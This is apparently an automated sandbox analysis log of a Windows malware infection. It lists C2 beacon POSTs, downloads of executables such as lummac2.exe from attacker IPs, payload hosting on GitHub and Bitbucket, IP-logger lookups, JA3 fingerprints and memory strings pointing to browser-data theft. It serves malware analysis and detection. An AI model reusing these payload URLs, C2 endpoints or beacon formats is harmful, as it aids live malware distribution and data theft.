Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.67 185.215.113.67
Source: Joe Sandbox View	IP Address: 185.215.113.67 185.215.113.67
Source: Joe Sandbox View	IP Address: 4.185.27.237 4.185.27.237

Source: Joe Sandbox View	ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: LEVEL3US LEVEL3US

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:52897 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.77.81

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 2_2_00CFBD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

2_2_00CFBD30

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=snCtFLruYoD2GD+&MD=SB3RsRL1 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221015Z&X-Amz-Expires=300&X-Amz-Signature=c163ac208612b7b63d5785e8f151bf6531baa21ef9044bfa7b39e25f7ba95711&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tmp/1.exe HTTP/1.1Host: comrex.pk
Source: global traffic	HTTP traffic detected: GET /4c7L8Zs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pixel.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /George.exe HTTP/1.1Host: moreapp4you.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /frielandrews892/File/releases/download/File/File.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/815364555/bff378a0-db1f-4958-863d-f942e941cea1?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240623%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240623T221029Z&X-Amz-Expires=300&X-Amz-Signature=af2e0f4cdd3db0a9b9d73ae7a4618c6cf1459a9d98ec9620de05c094591202f1&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DFile.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tons1/tronssss/downloads/5geo.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2e88b5ff-15af-42da-aaae-e65938d632e2/downloads/8ec94b2f-0bee-467a-979c-d152d74b6b83/5geo.exe?response-content-disposition=attachment%3B%20filename%3D%225geo.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJIBTCJVT&Signature=tjx3UYEd%2Fu3DTSp8pqQDsBEn5Is%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAePWN9bqbzKFV4W1jlqY%2B2IC9HQ1lq9ul%2FsBNxJqUGfAiEAgXldbcYRKjI9j0sReAGp9XE3D%2FC7L%2BjKiECYbFauZ%2B0qsAIIl%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJa1Oxy7WjMYvEFUGiqEAi9apPZmrQbF%2FK2PWFsJSGhkeSLVH5VtT7kV15hVFRE77icQ6LzMNkeJigGbz4sHg3TZ3lopaxd64ZgYeB7rWGtVHNATJsmZoxA%2F9Vd48ItxGuW8d9%2BYG9fm0Tu8nVDW22rOhFWQ4SQPo7gP6uMWw%2Fu9Q1EJGAKOe4JiffKVLi3uZuPi8AYB8j1MquDBf3WAgb2vv%2FgSoPQRObbX0OkfyFeUDo%2Bna80Zh4v6XDTaHvC5JTODmeHg41UFnkzAP4HFYjVqgcnXxAf4s703Ks6GNu8YabTRCs%2FrgySi0qjcvrgsQ2O5t6T0h9lVoiZP9evoDAjP5%2FNNWiCymkV1MYArZWOoOKdGMMq44rMGOp0BCdM12mesubPrtlg52rlPU1gfmywiP2Un5s72UeH9ztPaKWvzHLGcQxg71ozZosXuHk5%2FNy5tI8ttB2WNlIjfQ0HDWeRHpaXqqmeqRcQNOVd4dmQ%2B7mdAhCG26UXDf4cOEErJSiRJzZT8pIcmSJw6R8Pc%2BtmrkV9OeYcOQSXdscPusE2xrhSqTYUrGFA8DiZRlkUIy71IZHjIjWFfBA%3D%3D&Expires=1719182162 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1lLub HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Website.php HTTP/1.1Host: starjod.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iplogger.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iplogger.co/1lLubAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
Source: global traffic	HTTP traffic detected: GET /url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer HTTP/1.1Host: www.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Website.php HTTP/1.1Host: starjod.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=snCtFLruYoD2GD+&MD=SB3RsRL1 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /lend/ama.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /lend/gold.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /lend/lummac2.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /NewLatest.exe HTTP/1.1Host: 185.172.128.116
Source: global traffic	HTTP traffic detected: GET /lend/legs.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /lend/taskweaker.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: GET /FirstZ.exe HTTP/1.1Host: 185.172.128.116
Source: global traffic	HTTP traffic detected: GET /Website.php HTTP/1.1Host: starjod.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: RegAsm.exe, 00000017.00000002.2259714119.000000000316C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000017.00000002.2259714119.000000000316C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000017.00000002.2259714119.000000000316C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000017.00000002.2259714119.000000000316C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,]q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: comrex.pk
Source: global traffic	DNS traffic detected: DNS query: bit.ly
Source: global traffic	DNS traffic detected: DNS query: pixel.com
Source: global traffic	DNS traffic detected: DNS query: moreapp4you.online
Source: global traffic	DNS traffic detected: DNS query: starjod.xyz
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: iplogger.co
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: findalltechs.xyz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: facilitycoursedw.shop

Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/405117-2476756634-1003
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/717737fcc7e25778c9c8c4e4cddaa70#
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/717737fcc7e25778c9c8c4e4cddaa70#014001
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/FirstZ.exe
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Local
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php1mb3JtLXVybGVuY29kZWQ=do
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php1mb3JtLXVybGVuY29kZWQ=es
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php1mb3JtLXVybGVuY29kZWQ=x
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php3
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php3GvQs8/index.php
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php6/
Source: Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php6r
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php?
Source: Hkbsse.exe, 0000000B.00000003.4163886975.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpK
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpLAGM
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpM#
Source: Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000003.4164013581.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpO
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpP
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpQs8/index.php
